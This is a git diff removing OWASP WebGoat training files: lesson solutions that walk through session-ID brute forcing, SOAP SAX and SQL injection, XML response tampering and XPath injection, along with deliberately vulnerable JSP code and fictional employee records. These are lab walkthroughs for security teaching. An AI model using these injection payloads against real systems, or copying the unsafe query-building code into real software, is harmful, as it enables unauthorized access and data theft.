-In this case, we will add WEAKID=16965-1312472439##1##; to the Cookie paramter of our request. The ##1## replaces the part of the timestamp that varies in our range. Next, we specify this range. In the Paramter 1 Tab, we set From as 375, and To as 484.

- -
-J-Baah setup.

-Lastly, go to the "Target" tab at the bottom right, and set the Host to localhost and the Port to whichever port WebGoat is using, generally 80 or 8080.
-Go back to the "Action" tab, and click Base Response. You should see a message on the bottom left that a response is generated successfully. Change Threads to 2 and then press Start. The bottom left window should start filling up with "Hijack a session"

- -
-All of the responses for each WEAKID. The successful attempt is highlighted.

- - -Before we go any further, it is important to understand what is happening here. The ##1## string is replaced with a different number in the range we specified and the request is sent. The first WEAKID tried is 16965-1312472439375, then it tries every timestamp until the last one, 16965-1312472439484. J-Baah collects all of these responses and shows them in the bottom left window.

- -Each line shows one response, and displays important information about it.

-0.99969 : 417 : : Hijack a Session
-Clicking base response tries the first WEAKID and sets its response as the control. This first number indicates how similar this response is to the base response. A value of 1 means the responses are identical. The further the number is from 1, the more different this response is.
-
-0.99969 : 417 : : Hijack a Session
-This second number is the value replacing the ##1## in our request.

-0.99969 : 417 : : Hijack a Session
-The last portion is the title of the response page. In this case, if it's not "Hijack a Session", something went wrong.

- -The value indicating similarity to the base response will tell us which WEAKID worked. If everything went swimmingly, there should only be three values for this number. Look again at the screenshot above. There are many responses showing .99969, one showing .9949, then many more showing .99954. The response stayed the same until we got to the WEAKID ending in 429, then it changed. This is where the brute force succeeded. Right click on this response and click "Show Response".

- -
-This WEAKID worked! We hijacked this session.

- -Refreshing the lesson should show it is complete.

- - - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID.htmlBAK b/src/main/webapp/lesson_solutions_1/WeakSessionID.htmlBAK
deleted file mode 100644
index d2605b85c..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID.htmlBAK
+++ /dev/null
@@ -1,889 +0,0 @@
- - - - - - - -Solution: How to Hijack a Session - - - - - - - - - - - - -
- -

 

- -

Lesson -Plan Title: How to -Hijack a Session

- -

 

- -

Concept / -Topic To Teach:

- - - -

Application -developers who develop their own session IDs frequently forget to incorporate -the complexity and randomness necessary for security. If the user specific -session ID is not complex and random, then the application is highly -susceptible to session-based brute force attacks.

- -

 

- -

General -Goal(s):

- -

Try to access -an authenticated session belonging to someone else.

- - - -

 

- -

In this -lesson the purpose is to predict the WEAKID value. The WEAKID is used to -differentiate authenticated and anonymous users of WebGoat.

- -

 

- -

- -

 

- -

 

- -

Solution:

- -

 

- -

The easiest -way to complete this lesson is to use WebScarab's Session ID Analysis.

- -

 

- -

Go to -WebScarab and click on the button "SessionID Analysis". Select the last POST -request from the "Previous requests" drop-down box.

- -

- -

Figure 1 WebScarabs SessionID Analysis

- -

 

- -

To make sure -that WebScarab is able to fetch the WEAKID cookie, you need to click the "Test" -button on the bottom of the screen. A pop-up window must be shown like below.

- -

 

- -

- -

Figure 2 SessionID WEAKID discovered

- -

 

- -

If you don’t -have a pop-up window with the Extracted Sessionids, you must edit the Request. -You must delete the WEAKID value from the request. Without this cookie value, -WebGoat will return a HTTP Header "Set-Cookie: WEAKID=value" so WebScarab -learns about this value.

- -

 

- -

 

- -

Fetch 50 -samples and examine the results. Enter "50" in the "Samples" window and click -the button "Fetch". You will not see any information about progress.

- -

 

- -

- -

 

- -

Now you need -to go to the tab "Analysis".

- -

 

- -

- -

 

- -

In the "Analysis" -pane you see nothing.

- -

- -

You must -select the Session Identifier WEAKID value from the drop-down box.

- -

 

- -

- -

 

- -

The WEAKID is -divided in 2 parts: the first part is an identifier that is added 1 in every -cookie and a time value. The time value is calculated at the moment that you -submit the request.

- -

 

- -

Notice that -there is sometimes a gap in the first value of the WEAKID, skipping with 1. The -value that is missing is the value that you need to know to log on. Now you -only need to calculate the timestamp. This can be brute-forced using Crowbar. -You know the previous timestamp and the next timestamp so you have a start and -end value.
-You can download Crowbar for free: http://www.sensepost.com/research/crowbar/ -

- -

 

- -

- -

 

- -

There is a -value 16935 and a value 16937 with a numeric difference of 28110 instead of -14109, so there the WEAKID cookie is located. Copy and paste the raw HTTP -request in Crowbar:

- -

- -

Figure 3 Crowbar

- -

 

- -

Change target -to localhost and adjust the port.

- -

Create a Base -response. Make sure that you see "How to hijack a session" in the middle -window.

- -

 

- -

Insert ##1## -in the WEAKID parameter where you want to brute-force the value and be aware, that the first part of the WEAKID is the one we are searching for (16936). -The WEAKID in Crowbar lookes like this: Cookie: JSESSIONID=...; WEAKID=16936-1163685##1##;
-Start the first loop at 363093, the last digits of the last cookie before the -authentication cookie and 363203, the first cookie after the authentication -cookie. You have to enter these two values in the Parameter1 fields. We have to brute-force these values, but we are sure that they lie -between these two boundaries.

- -

Examine the -results until you see a different fuzzy logic value (the blue line in Figure 3), right-click it and click on "Show -reply".

- -

 

- -

- -

Figure 4 Lesson 12 Completed

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/colorschememapping.xml b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
- -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/filelist.xml b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/filelist.xml
deleted file mode 100644
index 082acf789..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/filelist.xml
+++ /dev/null
@@ -1,25 +0,0 @@
- - - - - - - - - - - - - - - - - - - - - - - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image001.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image001.png
deleted file mode 100644
index 560ca80c0..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image003.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image003.png
deleted file mode 100644
index f0100265e..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image005.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image005.png
deleted file mode 100644
index c42733b93..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image007.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image007.png
deleted file mode 100644
index a34c6751c..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image010.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image010.png
deleted file mode 100644
index 0c6fe9313..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image010.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image012.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image012.png
deleted file mode 100644
index 46b787813..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image012.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image014.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image014.png
deleted file mode 100644
index bde7fd0bd..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image014.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image016.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image016.png
deleted file mode 100644
index d25bc4167..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image016.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image018.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image018.png
deleted file mode 100644
index bb0344681..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image018.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image020.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image020.jpg
deleted file mode 100644
index b825cea5d..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image021.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image021.jpg
deleted file mode 100644
index a7fd9b516..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image022.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image022.jpg
deleted file mode 100644
index b38898623..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image022.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image023.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image023.jpg
deleted file mode 100644
index 0c3616032..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image023.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image024.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image024.jpg
deleted file mode 100644
index 632ca5835..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image024.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image025.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image025.jpg
deleted file mode 100644
index 0ab015bbb..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image025.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image026.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image026.jpg
deleted file mode 100644
index bc5a7fe32..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image026.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image027.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image027.jpg
deleted file mode 100644
index 7bbdb5f09..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image027.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image028.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image028.jpg
deleted file mode 100644
index 4530c95f9..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image028.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image029.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image029.jpg
deleted file mode 100644
index 112d5259b..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image029.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/themedata.thmx b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WsSAXInjection.html b/src/main/webapp/lesson_solutions_1/WsSAXInjection.html
deleted file mode 100644
index c5e854290..000000000
--- a/src/main/webapp/lesson_solutions_1/WsSAXInjection.html
+++ /dev/null
@@ -1,917 +0,0 @@
- - - - - - - -Solution: Web Service SAX Injection - - - - - - - - - - - - -
- -

Lesson Plan Title: How to Perform Web Service SAX -Injection

- -

 

- -

Concept / Topic To Teach:

- - - -

Web Services -communicate through the use of SOAP requests. These requests are submitted to a -web service in an attempt to execute a function defined in the web service -definition language (WSDL) file.

- -

 

- -

General Goal(s):

- -

Some web -interfaces make use of Web Services in the background. If the frontend relies -on the web service for all input validation, it may be possible to corrupt the -XML that the web interface sends.
-
-

- -

In this -exercise, try to change the password for a user other than 101.

- -

 

- -

 

- -

 

- -

Solution:

- -

 

- -

To succeed -this lesson it is required to reset the password of the user with a different -user-ID then 101 (which is your user-ID)

- -

.

- -

When you fill -out a password and click on "Go!" the following XML request will be created, -submit and parsed by the SAX parser:

- -

 

- -
<?xml version='1.0' encoding='UTF-8'?>
<wsns0:Envelope
  xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
  xmlns:xsd='http://www.w3.org/2001/XMLSchema'
  xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'
  xmlns:wsns1='http://lessons.webgoat.owasp.org'>
  <wsns0:Body>
    <wsns1:changePassword>
      <id xsi:type='xsd:int'>101</id>
      <password xsi:type='xsd:string'>[password]</password>
    </wsns1:changePassword>
  </wsns0:Body>
</wsns0:Envelope>
- -

 

- -

SAX parsers will parse anything that -is well-formed, meaning that there are matching end and close tags and that the -schema is correct. When you are able to add a new changePAssword element with -corresponding id tag and password tag, the SAX parser will be more than happy -to change the password for the user-ID provided.

- -

So you need to have something like -this as a final result:

- -

 

- -

<?xml version='1.0' -encoding='UTF-8'?>

- -

<wsns0:Envelope

- -

  -xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'

- -

  -xmlns:xsd='http://www.w3.org/2001/XMLSchema'

- -

  -xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'

- -

  -xmlns:wsns1='http://lessons.webgoat.owasp.org'>

- -

  -<wsns0:Body>

- -

    -<wsns1:changePassword>

- -

      -<id xsi:type='xsd:int'>101</id>

- -

      -<password xsi:type='xsd:string'>[password]</password>

- -

    -</wsns1:changePassword>

- -

    -<wsns1:changePassword>

- -

      -<id xsi:type='xsd:int'>102</id>

- -

      -<password xsi:type='xsd:string'>notforyoutoknow</password>

- -

    -</wsns1:changePassword>

- -

  -</wsns0:Body>

- -

</wsns0:Envelope>

- -

 

- -

This requires to inject:

- -

newpassword</password>

- -

    -</wsns1:changePassword>

- -

    -<wsns1:changePassword>

- -

      -<id xsi:type='xsd:int'>102</id>

- -

      -<password xsi:type='xsd:string'>notforyoutoknow

- -

 

- -

There are field-limitations in the -HTML input field, so it is required to intercept the HTTP Request with -WebScarab and replace the parameter password with the payload.

- -

 

- -

Enter a password 'test' and click -"Go!".

- -

- -

Figure -113 Reset password with test

- -

 

- -

Intercept the request in WebScarab and -replace the string test with the payload.

- -

 

- -

- -

Figure -114 Intercept request

- -

 

- -

- -

Figure -115 Inject XML payload

- -

 

- -

- -

Figure -116 Lesson completed

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/WsSqlInjection.html b/src/main/webapp/lesson_solutions_1/WsSqlInjection.html
deleted file mode 100644
index c9423fcdc..000000000
--- a/src/main/webapp/lesson_solutions_1/WsSqlInjection.html
+++ /dev/null
@@ -1,767 +0,0 @@
- - - - - - - -Solution: Web Service SQL Injection - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform Web Service SQL Injection

- -

 

- -

Concept / -Topic To Teach:

- -

Web -Services communicate through the use of SOAP requests. These requests are -submitted to a web service in an attempt to execute a function defined in the -web service definition language (WSDL) file.

- -

 

- -

General -Goal(s):

- -

Check the web -service description language (WSDL) file and try to obtain multiple customer -credit card numbers. You will not see the results returned to this screen. When -you believe you have suceeded, refresh the page and look for the 'green star'.

- -

Solution:

- -

 

- -

This lesson -can be solved easily by using a web services tool called SOAPUI. But here you -will only use WebScarab. Go in WebScarab to the tab "Web Services". You will -see a history of invoked web services or WSDL files.

- -

 

- -

- -

Figure 1 Lesson 23

- -

 

- -

Open the -WebGoat WSDL file for this lesson (WsSqlInjection?WSDL) in a new window.

- -

 

- -

In WebScarab -you can select this WSDL from the top drop-down box. And WebScarab will parse -the XML file so you can select the operations to invoke. Then you can enter a -value for the parameters used to invoke the operation. For example fill out the -integer 101 for the ID value and click "Execute". WebScarab will pop-up a basic -authentication window. Enter username:guest, password:guest and host:localhost then click "Ok". -If the pop-up does not appear you have to go to "Tools" > "Credentials". There you should activate "Ask when required".

- -

 

- -

- -

Figure 2 Basic authentication

- -

 

- -

- -

Figure 3 Webservice Response

- -

 

- -

What happens -if you change 101 to 1 OR 1=1? Will you get all the credit cards?

- -

Yes J

- -

 

- -

- -

Figure 4 All the credit cards

- -

 

- -

Remark: when you don't get any responses you -might want to select the service and operation again from the drop-down box. A nice -feature here would be the ability to make a raw SOAP request.

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/XMLInjection.html b/src/main/webapp/lesson_solutions_1/XMLInjection.html
deleted file mode 100644
index 6bfd82437..000000000
--- a/src/main/webapp/lesson_solutions_1/XMLInjection.html
+++ /dev/null
@@ -1,862 +0,0 @@
- - - - - - - -Solution: XML Injection - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform XML Injection Attacks.

- -

 

- -

Concept / -Topic To Teach:

- -

This lesson -teaches how to perform XML Injection attacks.

- -

 

- -

How the -attacks works:   

- -

AJAX applications -use XML to exchange information with the server. This XML can be easily -intercepted and altered by a malicious attacker.

- -

 

- -

General -Goal(s):

- -

WebGoat-Miles -Reward Miles shows all the rewards available. Once you've entered your account -ID, the lesson will show you your balance and the products you can afford. Your -goal is to try to add more rewards to your allowed set of rewards. Your account -ID is 836239.

- -

 

- -

- -

Figure 1 AJAX Security - XML Injection

- -

 

- -

Solution:

- -

 

- -

To understand -the behavior of the AJAX application, enter your account number 836239 and -intercept the HTTP Request and HTTP Response using WebScarab.

- -

 

- -

- -

Figure 2 Enter account number

- -

 

- -

- -

Figure 3 Intercepted HTTP Request

- -

 

- -

- -

Figure 4 Intercepted HTTP Response

- -

 

- -

From the HTTP Response you can see that you get back an XML -message with the rewards for your account:

- -

 

- -

<root>

- -

<reward>WebGoat t-shirt 20 Pts</reward>

- -

<reward>WebGoat Secure Kettle 50 Pts</reward>

- -

<reward>WebGoat Mug 30 Pts</reward>

- -

</root>

- -

 

- -

What happens if you intercept this HTTP Response and update -the XML message to become:

- -

 

- -

<root>

- -

<reward>WebGoat t-shirt 20 Pts</reward>

- -

<reward>WebGoat Secure Kettle 50 Pts</reward>

- -

<reward>WebGoat Mug 30 Pts</reward>

- -

<reward>WebGoat Core Duo Laptop 2000 -Pts</reward>

- -

<reward>WebGoat Hawaii Cruise 3000 Pts</reward>

- -

</root>

- -

 

- -

- -

Figure 5 Changed XML response

- -

 

- -

You need to -do this three times!

- -

 

- -

- -

Figure 6 Injected XML results

- -

 

- -

- -

Figure 7 Select your reward

- -

 

- -

Select the -Laptop and the Cruise and click "Submit".

- -

 

- -

- -

Figure 8 Lesson completed

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/XPATHInjection.html b/src/main/webapp/lesson_solutions_1/XPATHInjection.html
deleted file mode 100644
index 09208cf6d..000000000
--- a/src/main/webapp/lesson_solutions_1/XPATHInjection.html
+++ /dev/null
@@ -1,788 +0,0 @@
- - - - - - - -Solution: XPATH Injection - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform XPATH Injection Attacks.

- -

 

- -

Concept / -Topic To Teach:

- -

This lesson -teaches how to perform XPath Injection attacks.

- -

 

- -

How the -attacks works:

- -

Similar to SQL -Injection, XPATH Injection attacks occur when a web site uses user supplied -information to query XML data. By sending intentionally malformed information -into the web site, an attacker can find out how the XML data is structured or -access data that they may not normally have access to. They may even be able to -elevate their privileges on the web site if the xml data is being used for -authentication (such as an xml based user file). Querying XML is done with -XPath, a type of simple descriptive statement that allows the xml query to -locate a piece of information. Like SQL you can specify certain attributes to -find and patterns to match. When using XML for a web site it is common to -accept some form of input on the query string to identify the content to locate -and display on the page. This input must be sanitized to verify that it doesn't -mess up the XPath query and return the wrong data.

- -

 

- -

General -Goal(s):

- -

The -form below allows employees to see all their personal data including their -salaries. Your account is Mike/test123. Your goal is to try to see other -employees data as well.

- -

 

- -

- -

Figure 1 XPath Injection

- -

 

- -

XPath injection is similar to SQL Injection. Input is not validated and -used to create a XPath query. Here you can see how the XPATH query is built:

- -String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");
-File d = new File(dir);
-XPathFactory factory = XPathFactory.newInstance();
-XPath xPath = factory.newXPath();
-InputSource inputSource = new InputSource(new FileInputStream(d));
-String expression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
-nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);

-
-

- -

 

- -

- -

Figure 2 Inject XPath payload

-

 

-

-Injecting Smith' or 1=1 or 'a'='a will log you on -as the first user defined in the system. Password is a required field, so there -you can enter whatever you want.

-This is what the server gets:
-expression = "/employees/employee[loginID/text()='Smith' or 1=1 or 'a'='a' and passwd/text()='password']"

-And this is how the server interprets it:
-expression = "/employees/employee[ ( loginID/text()='Smith' or 1=1 ) OR ( 'a'='a' and passwd/text()='password' ) ]"
-

-

 

-

- -

Figure 3 Lesson completed

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/formate.css b/src/main/webapp/lesson_solutions_1/formate.css
deleted file mode 100644
index be54b8cca..000000000
--- a/src/main/webapp/lesson_solutions_1/formate.css
+++ /dev/null
@@ -1,2 +0,0 @@
-* { font-family:"Arial","sans-serif"; }
-code { font-family:"Courier New"; font-size:10pt; }
\ No newline at end of file
diff --git a/src/main/webapp/lessons/Ajax/clientSideFiltering.jsp b/src/main/webapp/lessons/Ajax/clientSideFiltering.jsp
deleted file mode 100644
index 178b75d3c..000000000
--- a/src/main/webapp/lessons/Ajax/clientSideFiltering.jsp
+++ /dev/null
@@ -1,114 +0,0 @@ - -<%@ page language="java" contentType="text/html; charset=ISO-8859-1" - pageEncoding="ISO-8859-1"%> - -<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %> - -<% - - String userId = request.getParameter("userId"); - - - NodeList nodes = null; - - - - File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml")); - - if(d.exists()){ - System.out.print("File does exist"); - } - else{ - System.out.print("File DOES NOT exist"); - } - - System.out.println(d.getAbsolutePath()); - XPathFactory factory = XPathFactory.newInstance(); - XPath xPath = factory.newXPath(); - InputSource inputSource = new InputSource(new FileInputStream(d)); - - - - - - - StringBuffer sb = new StringBuffer(); - - sb.append("/Employees/Employee/UserID | "); - sb.append("/Employees/Employee/FirstName | "); - sb.append("/Employees/Employee/LastName | "); - sb.append("/Employees/Employee/SSN | "); - sb.append("/Employees/Employee/Salary "); - - String expression = sb.toString(); - - - System.out.print("expression:" + expression); - - - - nodes = (NodeList) xPath.evaluate(expression, inputSource, - XPathConstants.NODESET); - int nodesLength = nodes.getLength(); - - - System.out.println("nodesLength:" + nodesLength); - - TR tr; - - int COLUMNS = 5; - - Table t2 = null; - if (nodesLength > 0) - { - t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder( - 1).setWidth("90%").setAlign("center"); - tr = new TR(); - tr.addElement(new TD().addElement("UserID")); - tr.addElement(new TD().addElement("First Name")); - tr.addElement(new TD().addElement("Last Name")); - tr.addElement(new TD().addElement("SSN")); - tr.addElement(new TD().addElement("Salary")); - t2.addElement(tr); - } - - - - tr = new TR(); - - for (int i = 0; i < nodesLength; i++) - { - Node node = nodes.item(i); - - if(i%COLUMNS==0){ - tr = new TR(); - tr.setID(node.getTextContent()); - //tr.setStyle("display: none"); - } - - 
tr.addElement(new TD().addElement(node.getTextContent())); - - if(i%COLUMNS==(COLUMNS-1)){ - t2.addElement(tr); - } - } - - if(t2 != null){ - out.println(t2.toString()); - } - else{ - out.println("No Results"); - } - - - - - - - - - - - -%> - diff --git a/src/main/webapp/lessons/Ajax/clientSideFiltering_backup.jsp b/src/main/webapp/lessons/Ajax/clientSideFiltering_backup.jsp deleted file mode 100644 index f8181cb0b..000000000 --- a/src/main/webapp/lessons/Ajax/clientSideFiltering_backup.jsp +++ /dev/null 
@@ -1,114 +0,0 @@ - -<%@ page language="java" contentType="text/html; charset=ISO-8859-1" - pageEncoding="ISO-8859-1"%> - -<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %> - -<% - - String userId = request.getParameter("userID"); - - - NodeList nodes = null; - - - - File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml")); - - if(d.exists()){ - System.out.print("File does exist"); - } - else{ - System.out.print("File DOES NOT exist"); - } - - System.out.println(d.getAbsolutePath()); - XPathFactory factory = XPathFactory.newInstance(); - XPath xPath = factory.newXPath(); - InputSource inputSource = new InputSource(new FileInputStream(d)); - - - - - - - StringBuffer sb = new StringBuffer(); - - sb.append("/Employees/Employee/UserID | "); - sb.append("/Employees/Employee/FirstName | "); - sb.append("/Employees/Employee/LastName | "); - sb.append("/Employees/Employee/SSN | "); - sb.append("/Employees/Employee/Salary "); - - String expression = sb.toString(); - - - System.out.print("expression:" + expression); - - - - nodes = (NodeList) xPath.evaluate(expression, inputSource, - XPathConstants.NODESET); - int nodesLength = nodes.getLength(); - - - System.out.println("nodesLength:" + nodesLength); - - TR tr; - - int COLUMNS = 5; - - Table t2 = null; - if (nodesLength > 0) - { - t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder( - 1).setWidth("90%").setAlign("center"); - tr = new TR(); - tr.addElement(new TD().addElement("UserID")); - tr.addElement(new TD().addElement("First Name")); - tr.addElement(new TD().addElement("Last Name")); - tr.addElement(new TD().addElement("SSN")); - tr.addElement(new TD().addElement("Salary")); - t2.addElement(tr); - } - - - - tr = new TR(); - - for (int i = 0; i < nodesLength; i++) - { - Node node = nodes.item(i); - - if(i%COLUMNS==0){ - tr = new TR(); - tr.setID(node.getTextContent()); - //tr.setStyle("display: none"); - } - - 
tr.addElement(new TD().addElement(node.getTextContent())); - - if(i%COLUMNS==(COLUMNS-1)){ - t2.addElement(tr); - } - } - - if(t2 != null){ - out.println(t2.toString()); - } - else{ - out.println("No Results"); - } - - - - - - - - - - - -%> - diff --git a/src/main/webapp/lessons/Ajax/clientSideValidation.jsp b/src/main/webapp/lessons/Ajax/clientSideValidation.jsp deleted file mode 100644 index a035833c3..000000000 --- a/src/main/webapp/lessons/Ajax/clientSideValidation.jsp +++ /dev/null @@ -1,30 +0,0 @@ -<%@ page language="java" contentType="text/html; charset=ISO-8859-1" - pageEncoding="ISO-8859-1"%> - - - -<% String coupon = request.getParameter("coupon"); - -if (coupon.equalsIgnoreCase("PLATINUM")){ - out.print(".25"); -} -else if (coupon.equalsIgnoreCase("GOLD")){ - out.print(".5"); -} -else if (coupon.equalsIgnoreCase("SILVER")){ - out.print(".75"); -} -else if (coupon.equalsIgnoreCase("BRONZE")){ - out.print(".8"); -} -else if (coupon.equalsIgnoreCase("PRESSONE")){ - out.print(".9"); -} -else if (coupon.equalsIgnoreCase("PRESSTWO")){ - out.print(".95"); -} - - - -%> - diff --git a/src/main/webapp/lessons/Ajax/employees.xml b/src/main/webapp/lessons/Ajax/employees.xml deleted file mode 100644 index 8e0df8fcc..000000000 --- a/src/main/webapp/lessons/Ajax/employees.xml +++ /dev/null 
@@ -1,254 +0,0 @@ - - - - 101 - Larry - Stooge - 9175 Guilford Rd - New York, NY - 443-689-0192 - 1012000 - 386-09-5451 - 55000 - 2578546969853547 - 5000 - Does not work well with others - Constantly harassing coworkers - 10106 - - 102 - 111 - 112 - - - - 102 - Moe - Stooge - 3013 AMD Ave - New York, NY - 443-938-5301 - 3082003 - 936-18-4524 - 140000 - NA - 0 - Very dominating over Larry and Curly - Hit Curly over head - 101013 - - 112 - - - - 103 - Curly - Stooge - 1112 Crusoe Lane - New York, NY - 410-667-6654 - 2122001 - 961-08-0047 - 50000 - NA - 0 - Owes three-thousand to company for fradulent purchases - Hit Moe back - 101014 - - 102 - 111 - 112 - - - - 104 - Eric - Walker - 1160 Prescott Rd - New York, NY - 410-887-1193 - 12152005 - 445-66-5565 - 13000 - NA - 0 - Late. Always needs help. Too intern-ish. - Bothering Larry about webgoat problems - 101013 - - 107 - 102 - 111 - 112 - - - - 105 - Tom - Cat - 2211 HyperThread Rd. - New York, NY - 443-599-0762 - 1011999 - 792-14-6364 - 80000 - 5481360857968521 - 30000 - Co-Owner. - NA - 0 - - 106 - 102 - 111 - 112 - - - - 106 - Jerry - Mouse - 3011 Unix Drive - New York, NY - 443-699-3366 - 1011999 - 858-55-4452 - 70000 - 6981754825013564 - 20000 - Co-Owner. - NA - 0 - - 102 - 111 - 112 - - - - 107 - David - Giambi - 5132 DIMM Avenue - New York, NY - 610-521-8413 - 5011999 - 439-20-9405 - 100000 - 6981754825018101 - 10000 - Strong work habbit. Questionable ethics. - Hacked into accounting server. Modified personal pay. - 61402 - - 102 - 